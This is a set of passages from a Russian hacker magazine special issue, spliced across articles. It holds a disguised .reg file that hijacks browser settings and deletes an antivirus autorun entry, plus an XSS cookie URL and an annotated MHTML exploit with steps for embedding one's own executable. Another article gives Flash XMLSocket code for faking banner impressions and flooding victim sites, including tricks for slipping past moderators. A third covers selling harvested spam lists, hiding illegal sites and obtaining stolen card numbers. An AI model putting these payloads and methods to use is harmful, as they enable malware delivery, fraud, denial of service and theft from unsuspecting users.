В свое время также был очень популярен халявный доступ в инет через сети x25, который раздавали некоторые добрые хакеры. Так вот, чтобы настроить доступ, юзеру нужно было слить файло с коннекшн скриптом и установить его себе. Кто мешает выдать наш reg-файл за такую же мазу? Ведь, как показывает практика, юзеры редко заглядывают в содержание таких файлов.

Вот какой reg-файл намутил Дронич:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Local Page"="C:\\WINNT\\System32\\xakpage.htm"

; Это есть та страничка, которая загрузится, если у юзера вообще отключен хоумпейдж :).

; Страшное западло :), так как about:blank можно отключить только из командной строки (iexplore.exe -nohome), а это не всем дано.

"Start Page"="http://www.pipets.ru "

; Это та самая стартовая страница.

"Search Page"="http://www.pipets.ru "

; Это страница, на которую юзер перенаправляется, если введенный им урл голимый и включен автопоиск.

; Практика показывает, что отключают его только продвинутые люди.

"FullScreen"="yes"

; Sevranty и так предусмотрел фулскрин, но можно еще подстраховаться :)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"SpIDer"=-

; А эта херь удаляет ДокторВеба

; Аналогично можно разобраться с Каспером.

;[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

; А вот это чистый термояд - удаляет ВСЕ запускаемое с правами машины

; Можешь снять с него РЕМ на свой страх и риск :).

Заметь, что такой РЕГ-файл поменяет только юзерские настройки. Если ты хочешь замутить настоящее зло, поменяй ключ HKEY_CURRENT_USER на HKEY_LOCAL_MACHINE – он гораздо козырней и поменяет паги сразу для всех юзеров. Кстати, обратная замена возможна только таким же путем – через регедит.

СВЕЖИЕ ДЫРЕНИ

Но, само собой, столь ненадежные методы Донора не удовлетворили, и он полез по bugtraq'ам и был сражен буквально наповал свеженькими дырами от MSIE (читай "мясо").

Первый баг грозит охотникам за флэш-мультиками. Оказывается, когда мясо загружает какой-нибудь мультимедиа-файл, оно генерит отдельную страничку и при этом ни фига не фильтрует линк на файло, который ему пихнули. Так что если к линку на флэшку приписать скрипт, осел его безропотно выполнит.

Например урла

http://www.macromedia.com//shockwave/download/triggerpages_mmcom/flash.swf?"><SCRIPT>alert(document.cookie)</SCRIPT>

запишет тебе на тачку куку.

Подробнее читай здесь:

http://www.securityfocus.com/bid/6481/discussion/

Второй глюк - это вообще песня! Называется бага self-executing html file. Дыра заключается в том, что если прямо в хытымыльку воткнуть исполняемый файл и небольшой скрипт, то при открытии его ишаком, последний его с удовольствием исполнит. Работает бага для всех Виндов и ослов пятой и шестой версий. Подробнее читай здесь:

http://www.securityfocus.com/bid/6961

http://www.securityfocus.com/archive/1/313355/2003-02-27/2003-03-05/0


Спецвыпуск Xakep, номер #029, стр. 029-020-9, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-9

А коменты Дронича помогут тебе въехать, что тут и как:

//REMS by Dronich

//Стандартный заголовок почтовика.

MIME-Version: 1.0

//Далее идет описание файла, прописанного в теле письма как аттачмент.

Content-Location:file:///malware.exe

//Закодирован он по бейз64, самый клевый способ кодирования.

Content-Transfer-Encoding: base64

//Непосредственно файл. Импортируй его в почтовик, и ты увидишь АСКИИ.

//Первые два символа - MZ - этого нам достаточно, чтобы понять, что

//файло исполняемое. Не-АСКИИ символы в БАТе не увидеть :(.

//EXEbegin

...

и еще до фига белиберды...

...

PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=

//EXEend

//Верхушка паги :). Все по-ламоботски просто.

<!-- 25.02.03 - http://www.malware.com -->

<title>malware.com</title>

<body bgcolor=black scroll=no>

//Угу. Скриптик. Смотрим, что делают:

<SCRIPT>

//25.02.03 - http://www.malware.com

//Описываем функцию.

function malware()

{

//В s кладем путь к файлу.

s=document.URL;

//В path кладем ту часть s, которая до последних слэшей (то бишь чисто ПУТЬ).

path=s.substr(-0,s.lastIndexOf("\\"));

//Если были ESC-chars - убиваем.

path=unescape(path);

//Вписываем в тело ХТМЛки следующее (вообще должна быть одна строка, но мы все равно компилить не собираемся):

document.write( '

//Началась чистая косметика - толку никакого :)

<title>

malware.com

</title>

<body scroll=no bgcolor=black>

<FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">

malware.com

</center>

//А вот тут косметика кончилась...

//И понеслась!.. Внедрили объект с мистическим класс-айди, к которому точно нет описания в реестре.

//Стайл и альт - для красоты.

<object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666"

//Гвоздь программы! Говорим винде, что объект с таким классом обрабатывается прогой, лежащей по адресу:

CODEBASE="mhtml:'+path+'\\malware.html!file:///malware.exe">

//То есть непосредственно в теле нашего письма :). Просто, как полбублика.

//С чистой совестью закрываем скобки и теги.

</object>

')

}

//А теперь вызываем описанную функцию с небобовой частотой (раз в 150 мс)

setTimeout("malware()",150)

</script>

//Вот так все банально. Ключи от дома в машине, машина в гараже, ключи от гаража дома :))).

//Вообще-то очень оригинально - заставить обработчик обрабатывать себя самого.

//Причем винда не заорет, так как адрес к проге-обработчику локальный, а значит запроса на загрузку нет :).

//А раз новых прог не инсталлим - то и орать не надо :).

Вот так-то! Ишак - самый жирный троян на твоей тачке. Ура M$!!! Так что поиметь в сети можно фигову тучу народу. Я уж молчу про то, что можно вообще сатанизм устроить, например, форматнуть всем винты, но я бы не стал себя ради шутки под статью подводить.

А чтобы запихать в этот эксплойт свой экзешник, который и замутит сатанинскую пати на отдельно взятом компе, надо воспользоваться самой хацкерской прогой всех времен и народов – TheBat’ом. Держи соляшен, чувак:

1. Создать новый ящик в Бате и сказать ему «Хранить аттаченные файлы в письме».


Спецвыпуск Xakep, номер #029, стр. 029-020-10, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-10

2. Написать письмо от кого угодно кому угодно.

3. Приаттачить к этому письму свой заподлянский экзешник.

4. Сохранить письмо в отдельный файл (экспортнуть, проще говоря).

5. Открыть файл блокнотом и скопировать аттач (его ты сразу узнаешь – он похож на хексовую белиберду :)).

6. Засунуть его туда, куда следует (то есть посреди моих комментов EXEbegin и EXEend).

Напоследок скажу, что мы не пытались сделать идеальную елду массового поражения, поэтому, возможно, у нашего военного HTTP DNS'а много недостатков. Если ты дружишь с головой и имеешь горячее желание, можешь принять участие в нашем open source проекте, так сказать, в ознакомительных целях. С удовольствием почитаем, каких результатов добился ты.


Спецвыпуск Xakep, номер #029, стр. 029-026-1, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-1

Как-то на предыдущих занятиях мы проходили DDOS-атаку, и был упомянут способ использования баннеров для наших благородных целей. Сегодня мы разберем эту тему поподробнее.

Кто нас будет раскручивать? Итак, для начала, что может быть использовано для DDOS с использованием баннерообменных сетей? Во-первых, это, конечно, HTML-баннеры, во-вторых, это Flash-баннеры. HTML-баннеры представляют собой не что иное, как обычную страничку, только очень компактную и маленькую. Как правило, грузятся внутри тегов <iframe>. Баннеры на основе Flash это тоже HTML-баннеры, но в структуре HTML ничего не записано, это всего-навсего загрузчик swf файла.

Как всегда, перед боем следует основательно подготовиться. Для написания flash советую поставить 4-ую, а лучше 5-ую версию Macromedia Flash, поскольку многие баннерообменные сети не принимают в оборот баннеры, написанные на 6-ом Flash. Для написания HTML-баннеров можешь использовать что угодно, мое предпочтение это FAR.

Теперь давай определимся с целью. Их может быть несколько: можно загрузить до потери пульса какой-нибудь сервер, если на сервере есть возможность регистрации, то это просто прелестно. Можно сделать жестокую накрутку своего сайта или счетчика или даже не своего, если тебе пообещали заплатить за клики, то сколько раз твой баннер покажут, столько по нему и кликнут. В общем, простор для фантазии достаточно велик. Теперь давай разберемся с несколькими возможными жертвами, проще говоря, с баннерообменными сетями.

reklama.uz

Представляет собой страшное детище программиста и дизайнера, вернее людей считающих себя таковыми. Явное преимущество - это слабый контроль за выставляемыми баннерами, ну скажите, кто будет ковырять ваш баннер до потери пульса, если ковыряльщиков всего двое? Его запустят, потыкают и убедятся, что вроде все нормально, на чем и успокоятся. Так что для полевых испытаний это наиболее подходящий кандидат, трафика бешенного не даст, но проверить систему в бою позволит. Помимо картиночных баннеров принимает HTML, Flash, CGI. Форматы 468x60, 100x100, 120х60, 120х600. Из форматов следует выбирать не тот, что побольше, нас не интересует графическая красота баннера, а тот, у которого показов больше. Так, если меняют 10 наших показов 468х60 на 20 их показов 100х100, то ты должен вешать у себя 468х60, а боевую модель готовить 100х100. Как делать клоны сайтов, я думаю, объяснять не стоит, главное набрать показов и побольше.

МАРК-ИТТ

Ну да ладно, вот и следующий кандидат (BANNERS.MARK-ITT.RU). Оный предоставляет возможность размещения горизонтальных баннеров 68х60, 100х100, 120х60, 226х131, Flash и вертикальных 234x60, 120x90, 125x125, 120х240, 120х600 и 160x600. Аналогичный контроль, то есть запугивание по полной, и фактически все пустые слова. По показам они будут получше, так, например 468х60 был показан 15828 раз за день, а 100х100 всего 8264 за день. Это, конечно, не Яндекс и не Yahoo, но на простенький внутрифирменный сервачок уже хватит. Главное отличие от предыдущего кандидата это не фокусированный на Узбекистане контингент, то есть IP-адреса бедолаг будут более разношерстными, а значит и суммарный трафик будет больше.


Спецвыпуск Xakep, номер #029, стр. 029-026-2, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-2

Монстры LBE и RLE

Тут уже с контролем получше, так что не стоит заливать явно бажный HTML-баннер. Тут надо действовать осторожнее, подгружать JavaScript файлы со своего сервера тебе уже не дадут, да и к загрузке картинки не очень хорошо отнесутся, могут вежливо попросить изменить адрес с относительного на абсолютный, но и трафик у них побольше будет. На момент написания статистика следующая: LBE - 2741610 показов, LBE-lite - 1244404, LBE-100 - 3586869, RLE - 24772338.

Как ты уже, наверное, заметил, для домашнего сайтика это не просто поток и даже не горная река, это все равно что планетой по комару врезать. Так что тут война уже идет по-крупному, таким трафиком, как уже писалось, был завален украинский сайт обмена баннеров. На всякий случай напомню, что для каждой баннерообменной сети тебе придется сделать "левое" мыло, "левый" сайт - и не какой-нибудь, а толковый и удовлетворяющий правилам баннерообменки (можешь просто его спереть :)).

Стадии лома

Хорош расслабляться, давай поговорим о деле, конкретно, что нам надо. Есть несколько финальных стадий, которые мы хотим с тобой получить.

Первая стадия - это кумулятивный показ. Кумулятивный - это когда из 1 ты делаешь 2, из 2 делаешь 4 и т.д. То есть саморастущая прибыль. Для осуществления сего требуется не сильно широкий канал, не очень большой сайт, да и вообще мало что требуется. Будем делать с тобой из показов показы. Допустим, у нас есть 1 показ, это гарантирует, что твой баннер где-нибудь покажется, но показы считаются только с твоего сайта, значит надо, чтобы внутри твоего баннера показался твой сайт (как минимум - твой баннер на твоем сайте). Самый простой (сразу оговорюсь, он не прокатит) способ для HTML-баннеров - это сделать внутри своего баннера <iframe> вставку с твоим сайтом. Но этот вариант умрет еще в зародыше, аналогично погибнет открытие второго фрейма, так что выкинь этот детский лепет из головы.

Вторая стадия - это накрутка счетчика, тут достаточно (как правило), чтобы картинка счетчика просто загрузилась. Многие счетчики слабо следят за referer ссылкой, хотя если это spylog, то тут лучше идти по способу баннера, то есть подделывать все (чуть ниже ты узнаешь, как это делать). Однако счетчик надо крутить не один раз за показ, а каждые 2-3 секунды, так что придется сделать мувик и на один из кадров подвесить action - крутилку счетчика.

Третья стадия наиболее грязная, но весьма пригодится спамерам, это глобальная раскрутка сайта. Как правило, ее можно использовать там, где платят за привлечение посетителей, а не за легальное и правильное привлечение посетителей. Проще говоря, для раскрутки порнухи. Делается все слишком просто, надо сделать в любом месте (лучше все же на центральном кадре мувика) action на загрузку страницы в области "_blank" или "_top", но чтобы об этом не узнали при проверке баннера, тебе придется дочитать статью :).

И наконец, глобальный натиск, завал канала сайта, или попросту заплевывание его запросами. Как ни странно, но осуществляется это проще, чем раскрутка баннера, зато защищать баннер от нососовательства в него придется более тщательно, поскольку нормального результата можно добиться, используя только глобалистов типа RLE или LBE, а там ребята получают килобаксы за проверку твоих творений, и будь уверен, при малейшем подозрении они тебя отшвырнут, просто так, на всякий случай. Престиж и имя для них высоко ценятся.


Спецвыпуск Xakep, номер #029, стр. 029-026-3, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-3

Рождение баннера

Итак, давай приступим к самому страшному и, в принципе, самому трудному. Давай сделаем баннер. Прежде всего, необходимо сделать мыло, халявное и не обязательно красивое. Маленький секрет, регистрируйся везде от женского имени, меньше будет запарок при проверках. Затем надо создать/скатать сайт, любой, лишь бы он удовлетворял требованиям баннерообменки. Затем надо заказать код баннера и как следует в нем разобраться.

<iframe src=http://www.linkexchange.ru/cgi-bin/erle.cgi?FFFFFF?ZZZ frameborder=0 vspace=0 hspace=0 width=468 height=60 marginwidth=0 marginheight=0 scrolling=no>

<a href=http://www.linkexchange.ru/users/027486/goto.map target=_top>

<img src=http://www.linkexchange.ru/cgi-bin/rle.cgi?FFFFFF?ZZZ alt="RLE Banner Network" border=0 height=60 width=468></a></iframe>

Там, где стоит FFFFFF, будет твой персональный номер, а вместо ZZZ должно быть случайное число. Лучше сделать несколько страниц, примерно штук 5, тогда и отдача будет больше (коэффициент накрутки). Все, первая часть пройдена. В Flash есть очень хорошая вещь, называется XMLSocket, она позволяет создавать коннект и отправлять любые данные на любой сервер; единственное ограничение - это номер порта должен быть больше 1024, поэтому тебе придется найти проксик. Не ищи анонимный, ищи самый обычный, который пересылает referer и IP, именно он вызовет меньше всего вопросов. Теперь давай возьмемся за грязное программирование. Сделай баннер, не обязательно красивый и кликабельный, нам это не интересно, главное, опять-таки, чтобы он внешне удовлетворял всем требованиям, то есть не моргал, чтобы на нем не было голых дефачек и т.п. Вставляем в него мувик и где-нибудь посерединке вешаем следующий код (номера строк тут просто для наглядности, не вздумай их вбивать :)).

1. head = "GET http://www.linkexchange.ru/cgi-bin/erle.cgi?FFFFFF?ZZZ HTTP/1.0\nConnection: keep-alive\n";

2. agent = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) IE 5.0 [ru]\n";

3. to = "Host: www.linkexchange.ru\n";

4. back = "Accept: text/html, image/jpeg, image/gif, */*\nAccept-Language: ru, en\nAccept-Charset: windows-1251;q=1.0, *;q=0.1\n";

5. referer = "Referer: http://www.ru/eng/index.html\n\n";

6. packet = head+agent+to+back+referer;

7. Sock = new XMLSocket();

8. if (Sock.connect("ip_of_proxy", 8080)) {

9. Sock.send(packet);

}

Разберемся, что мы делаем. С первой по пятую строку описываем то, что от нас хочет сервер. В шестой собираем все это в одну кучу. Седьмой создаем ту самую волшебную посылалку (сокет). Восьмой проверяем, есть ли контакт. Девятая - "есть контакт", шлем все, что мы тут делали. Все, мы показали наш баннер, по крайней мере, сервер так думает. Если хочешь, чтобы ZZZ всегда сам менялся, добавь random(999) при генерации head. Можешь сделать массив referer, ведущий на разные разделы твоей странички, и выбирать из него случайным образом одну строку. В общем, движок у тебя есть, дорабатывай, растачивай, делай с ним, что хочешь. Можешь добавить случайное срабатывание "клика", но не делай больше, чем 5%, это и так слишком высокий уровень отклика. Чистый клик, без открытия страницы, делается точно так же, как и показ, только нужно вписать чуть-чуть другую строку в переменную head. Если же тебе надо, чтобы страничка открылась в реале, то используй "грязный клик".


Спецвыпуск Xakep, номер #029, стр. 029-026-4, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-4

if (random(100) > 95) {

getURL ("http://www.linkexchange.ru/cgi-bin/rle.cgi?FFFFFF?ZZZ", "_top");

}

Со счетчиком все обстоит точно так же, только выбирай счетчик без JavaScript и помни, что ты меняешь показы баннера на накрутку счетчика, так что надо еще и баннер чуть-чуть подкручивать. Ну а для завала сайта смело втыкай вместо ссылки на твой баннер ссылку на файл с сайта жертвы, советую выбирать файл пожирнее. Если на том сайте есть Flash, можно использовать подзагрузку его флеша к себе в баннер; если есть звук (mp3, например), можно и его подгрузить как мувик, тут тебе не важен результат загрузки, важна сама загрузка :). Давай прикинем: на моем любимом RLE вчера было 24772338 посетителей, это чуть больше 286 посетителей в секунду, средний объем swf-ки 30 кило, что есть 8.5 метров в секунду. Весьма нехилая выделенка, если же учесть, что помимо тебя с этого сайта еще кто-то будет пытаться что-то скачать, то выходит очень большой трафик. В принципе одним файлом mp3 можно завалить среднего провайдера или картинкой jpg эдак кило на 200 :). А че, у них же канал широкий, они любят вешать картинки неподъемные ;). Главное при завале - не пользоваться XMLSocket-ом, потому как наиболее вероятно, что первым ляжет именно проксятник, а не сильная жертва. Если на сайте жертвы есть регистрация чего-либо, то можно сделать случайную регистрацию полумиллионной аудитории пользователей, что приведет не только к забиванию канала, но забьет диск сервера и загрузит проц.

Таможня

А теперь ты узнаешь страшное: как тебя будут шмонать в мент... то есть у баннарейщиков. Во-первых, глянь на свой swf в текстовом виде, и ты увидишь все свои строчки, что неправильно по определению. Их конечно можно закодировать, но потом твой мувик декомпильнут (или попробуют это сделать), но есть выход и из этого положения. Давай вынесем наш мувик с кликалкой в отдельный файлец, назовем его "fly0.swf" и сделаем точно такой же, но без кликалки, просто летающую фиговину; или можешь сделать мувик, со знаком зодиака, который постоянно будет меняться, или цену на товар, который ты якобы продаешь, ну подумай, зачем реально нужно выносить мувик, и постарайся закосить под это. А в основном баннере используй loadMovieNum ("http://mypage.ru/fly0.swf", 3); для "дозагрузки" кусочка. Во время проверки на твоем сервере должен лежать нормальный не кликающий мувик с обычной летающей мухой. Когда проверка пройдена и баннер выпущен на просторы, начисляй на него показы, устанавливай время показа с 2 ночи до 6 утра и смело подменяй мувик. Все, с утра ты уже проснешься с бешеным количеством показов (если, конечно, все сделал правильно). Можно не выносить мувик, а вынести только сами переменные, для этого есть loadVariables("data.txt", 0); он нам поможет избавиться от лишних строк, но не избавит нас от декомпиляции, зато можно задать условие, что, мол, если переменные не считались, то я обычный мувик, иначе кликать! Но лучше всегда считывать "правильные" переменные: цены, скорость передачи данных, загрузку канала, и прочий кал. И грамотно выдавать его на экран. Тогда не должно быть вопросов типа "а зачем вам скачивать это со своего сервера" или "а давайте мы их посмотрим", можно смело дать им файлец, и пусть ребята хоть зачитаются. Но в идеале нужно написать перловку, которая будет выкидывать данные в нужном формате до определенного времени, притом более или менее правдоподобные данные. А с 2 до 6 будет давать сама ссылки на разные баннеры (помнишь про random в конце баннера?) и разные referal. А чтобы даже после декомпиляции трудно было сообразить, что к чему, советую разнести всю эту требуху как можно дальше по мувикам. И не забывай про опцию "защитить от экспорта", она хоть как-то, но тоже создаст проблему.


Спецвыпуск Xakep, номер #029, стр. 029-026-5, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-5

Стартовый капитал

Все, есть движок, есть баннер и сайт с перлом, но нет стартового капитала. Давай попробуем сделать несколько показов. Для начала платный путь. Покупай себе карточку WM, делай кошелек и примерно за один буказоид ты сможешь поиметь 5000 показов RLE-Classic. Если учесть, что эти 5000 показов пролетят минут за 5 (и это еще очень медленно), то к утру у тебя должно быть эдак лямов 20, так что не слишком жадничай и старайся накручивать как можно меньше, не забывай про кумулятивный эффект, каждый показ вызывает еще 3 показа.

Теперь бесплатный путь. А кто, собственно, нам мешает послать наш "супербаннер", только в уменьшенном 1x1 варианте в аттаче, в письмеце с тупым спамом? Тупым именно для того, чтобы никто не разбирался, а просто посмотрел и грохнул. Можно сделать менее болезненно, просто спросить у друзей-знакомых 10-20 показов для "обкатки баннера". В принципе, ты их вернешь :))). Можно просто втупую накрутить, достаточно создать сайт из 20 страниц и недельку самому на него походить, но это вариант для тех, у кого хоть где-то есть халявный Инет. Ну и последнее, это холостые сайты; достаточно часто есть сайт, на который можно повесить баннер, да как-то незачем, например, сайт твоей фирмы из 3-х человек. Если такого нет, так придумай его, зарегистрируй во всех поисковиках, до которых дотянутся руки, и 2-3 чела в день будет. Пока ты будешь работать над созданием самонакручивающегося мегауничтожителя, у тебя уже появится капитал. При мудром подходе тебе хватит и 10 показов для завала, например, narod.ru.


Спецвыпуск Xakep, номер #029, стр. 029-026-6, ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

ДРУГАЯ СТОРОНА FLASH - имеем баннер, который имеет всех

Alex Shark (qqqqqwww@ring.by)

Спецвыпуск Xakep, номер #029, стр. 029-026-6

Помни, CTR выше 10% дают только порнобаннеры, а они запрещены!

Никогда не используй свой сайт и баннер с него в целях накрутки, закроют и всем наябедничают.

Не делай тяжелые баннеры, от их объема зависит реальное количество показов.


Спецвыпуск Xakep, номер #029, стр. 029-030-1, НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

Vitalii or Vint

Спецвыпуск Xakep, номер #029, стр. 029-030-1

(vitalii@shadrinsk.zaural.ru)

Драствуй! Сегодня я решил просветить весь честной народ о ценностях сети, какие они бывают, где добываются, как юзаются. Но сначала поделим их на 2 типа: имеющие похожесть в реале и не имеющие оной. В первой группе проживают Webmoney, во второй - все остальные. Не разводя флейму, приступим к делу!

Web money

В нашем Инет-мире много походит на мир, который ты видишь из окна: люди, работа, магазины, библиотеки, почта. Не надо быть большого ума, чтоб догадаться, что должны быть и деньги! Но это мы с тобой такие умные, а деньги в Инете появились относительно недавно! Сейчас эта идея называется Webmoney. Вообще, Webmoney это целая система, с помощью которой люди с любого уголка планеты могут совершать мгновенные денежные операции. Мы можем на наши Webmoney покупать стафф в Web-магазинах, платить за софт :), играть в казино, не отходя от компа, заказывать еду из Инета прямо домой (это вообще супер!). В общем, очень удобная весчь. Под эти сетевые денежки существует несколько типов Web-кошельков. Денежные операции представляют собой перекидывание единиц из одного кошелька в другой, для проведения таких действий необходимо учитывать тип кошелька - деньги можно перекидывать только в однотипные кошельки! А поменять WM можно в специальных обменных пунктах (http://wm.exchanger.ru). Система WM считается очень надежной. Залить деньги на свой Web-кошелек можно через любой банк (даже Сбербанк РФ!).

Вот сайты, где можно найти инфу о Webmoney: http://www.webmoneyworld.com, http://webmoney.ru, еще есть лист, посвященный электронным деньгам: emoney-ru-subscribe@yahoogroups.com, для подписки просто отправь туда пустое письмо.

Имя и домен

Наверно, Webmoney - единственная вещь, имеющая аналог в реале. Вряд ли в простой жизни ты стал бы вкалывать за присвоение тебе имени "Вася". А в сети офигенно ценится (читать: покупается) красивое, звучное и краткое имя сайта. Все маломальские компании, связанные с компутерами, стараются отхватить имя покороче да позвучней и зону выбирают позаковыристей! Не просто .ru, а .net, а то и .org! Эти самые org и net часто являются некой меркой "крутости" компаний. Многие директора считают: взять домен в буржуйском отделе Инета гораздо лучше - типа повысится престиж фирмы, пусть он даже стоит в несколько раз больше 10 уев в год за ru (не сказал бы... winfo.org обошелся нам дешевле winfo.ru - прим. Дронича). Недавний пример борьбы за домен в иностранном сегменте: Яндекс, отстаивая свои права в WIPO Arbitration and Mediation Center на домен в зоне .com, победил! И теперь www.Yandex.com принадлежит россиянам. Кстати, пока это единственный случай передачи домена в .com зоне российской компании! Эту ценность ты сейчас вряд ли сможешь поиметь (хотя можешь начинать сквоттерить), но на будущее знай, что и такое бывает в нашем мире.

Спам-лист

Эта фича ценится у ограниченного круга людей - спамеров - и носит имя спам-листа (для вагоновожатых: спам-лист - это файл, содержащий список действующих мыл). Ценность такого листа измеряется количеством адресов; чем больше адресов несчастных юзверов прописано в этом "документе", тем он круче. Также крутость спам-листа зависит от даты последней проверки - вот скажи, на кой фиг тебе спам-лист 91-го года проверки, где добрые 99 процентов - дохлые адреса? Обычно составители таких спам-листов собирают их для себя или для обмена с другими мыльными редисками, но бывают исключения - челы, имеющие шустрый Инет, иногда тоже занимаются сей работкой. Насобирав несколько тысяч валидных адресков, чел связывается со спамером и за несколько Web-монет соглашается отдать ему листик. Так совсем недавно видел несколько объявлений о покупке спам-листа, в среднем цена составляет 3 бакса за 10000 мыл. Вот такие пироги! А если ты сам хочешь заполучить такой листик и сменять его на некоторые благости, то вот этакие проги тебе помогут (надеюсь, ты не думаешь, что адреса собирают руками!): Mail Grabber (брать на www.mailgrabber.ru) и Advanced Email Extractor Pro от Александра Горлача (брать на www.massmail.ru), добавлю только, что это очень простые программки с русскими фейсом и хелпом. Так что вперед за мылами! Вот адреса, на который попадают объявы о купле/продаже спам-листов www.mafiaboard.ru, http://sale.userline.ru, www.mitinka.ru (тут в основном на форуме), и советую поковырять поисковик на наличие ссылок!


Спецвыпуск Xakep, номер #029, стр. 029-030-2, НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

Vitalii or Vint

Спецвыпуск Xakep, номер #029, стр. 029-030-2

Адрес

Ты не вчера родился и знаешь, что в сети полно противозаконных сайтов. Незаконными считаются сайты, пропагандирующие нацизм, рекламирующие или продающие наркоту, оружие, порнуху с героями младше 18 лет, и, конечно, сайты с мемуарами Данечки! Существуют специальные правительственные организации, которые ищут эти самые сайты и закрывают их, а иногда и весь сервак... Но любители Данечки нашли выход! Они создают сайт с левой темой, например, "жизнь тараканов в условиях холодильника студента МГУ", создают к нему очень слабый дизайн и собирают децл инфы, хоть немного касающейся темы, а на пятидесятом уровне вложенности выкладывают свою антинародную (но почему-то самую нужную всем!) инфу. Вот так-то: инфа лежит в Инете, но ее не найдешь ни через поисковик (они ж не дураки, чтоб свой сайт регистрировать), ни даже если случайно окажешься на этом сайте! Все любители порнухи готовы отдать любую благость, чтоб тока узнать адрес странички! Ты сам вряд ли легко найдешь такой сайт, но если хочется завладеть именно этим типом ценности - собирай мемуары и порно (сами мемуары это уже порно!) и создавай сайт по идеям, описанным выше. И тогда у тебя появится еще одна ценная вещь - адрес запрещенного сайта! Для обмена этой ценности на веб-деньги советую сходить на форумы, посвященные теме твоего запрещенного сайта, посмотреть листы на Яхе (отправь пустое письмо на reply.rulists@soobcha.ru).

Халявная инфа на мыло

Здесь я расскажу о еще одной ценности - инфе. Ведь Интернет создавался, прежде всего, для обмена инфой, сейчас в Инете можно найти ответ на любой вопрос! Нужно только грамотно искать! Предлагаемый мной способ поиска инфы очень экономичен, то есть ты сможешь искать инфу под заказ, зарабатывая при этом вполне реальные у.е.! Скорость нахождения вполне удовлетворительна - я, к примеру, нашел нужный мне патч за 1 день, потратив только 4 рубля - на скачивание его из моего ящика! Для поиска инфы мы будем использовать не тупые поисковики (Яндекс, Рамблер), а обычных людей и некоторые веб-службы. Для получения столь ценной инфы нам достаточно иметь доступ только к E-mail ящику. Начнем с майл конф, это пришедшие из фидо эхи. Очень большое количество (около 350!) русскоязычных эх можно найти здесь - www.groups.yahoo.com/group/ru-lists, или заказать список на мыло, отправив письмо на reply.rulists@soobcha.ru. Получив список, подписываемся на нужные, и через чуть-чуть у тебя будет ответ на твой вопрос. Видишь, как все просто! Еще можно почитать про эхи вот на этих сайтах - www.talk.ru, www.maillist.ru, www.mlist.list.ru, www.list.mail.ru, www.virtuals.atlant.ru, www.dir.ru/maillists, www.citycat.ru, news-center.da.ru, www.beep.ru. Но продолжим поиск халявной инфы! Если у тебя дохлый Инет, а сетью попользоваться охота, то это для тебя: юзай службу типа "WWW через мыло" - способ предельно экономичный, а если мыло бесплатное, то и халявный. Чтоб узнать об этих службах, отправь письмо на mailbase@mailbase.ac.uk и в теле письма напиши lis-iis e-access-inet.txt. Послушать и обсудить этот способ доступа в Инет можно намылив пустое письмо webmailtalk-subscribe@yahoogroups.com. Как видишь, ты можешь экономить и зарабатывать деньги на поиске инфы в Инете! Смело предлагай свои услуги и срубай благости реала!


Спецвыпуск Xakep, номер #029, стр. 029-030-3, НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

Vitalii or Vint

Спецвыпуск Xakep, номер #029, стр. 029-030-3

Креды

Ты уже догадался, о какой ценности я хочу сказать :), это номера кредитных карт. Уж об этой вещи ты слыхал, и причем не раз! Ведь зная номер кредитки, в Инете можно накупить всякого добра по самое не хочу! Тебе интересно, где берут эту благость бывалые кардеры? Я расскажу тебе основные способы заполучения столь нужных номеров (а с ними и халявных буказоидов!): поломать онлайновый магазин/банк, заюзать устаревшие, но иногда используемые генераторы и экстраполяторы, кинуть ламеров (универсальный способ для добычи чего бы то ни было :)), обменяться номерками с кул-хацкерами, соорудить собственный онлайн-магазин, торгующий чем-либо по кредам (ух, чем тока не торгуют! :)). Про банк я опускаю - не хочу смотреть на небо в клеточку :). Про генераторы и экстраполяторы скажу лишь, что служат они для генерирования кучи левых номеров с заведомо валидной карты. У большинства кардеров кидание лохов является основным способом срубания номеров. Происходит это аналогично выуживанию логинов и паролей к Инету. Так что ничего принципиально нового не юзают, все та же человеческая доверчивость! Обмен 